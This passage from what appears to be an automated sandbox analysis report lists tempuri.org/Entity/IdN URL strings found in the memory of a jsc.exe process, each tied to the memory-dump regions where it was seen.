Source: jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/(
Source: jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/(
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16(
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LR
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: jsc.exe, 00000013.00000002.2415056062.0000000003148000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000332D000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000033CB000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000328F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003051000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.000000000337C000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000013.00000002.2415056062.0000000003240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LR
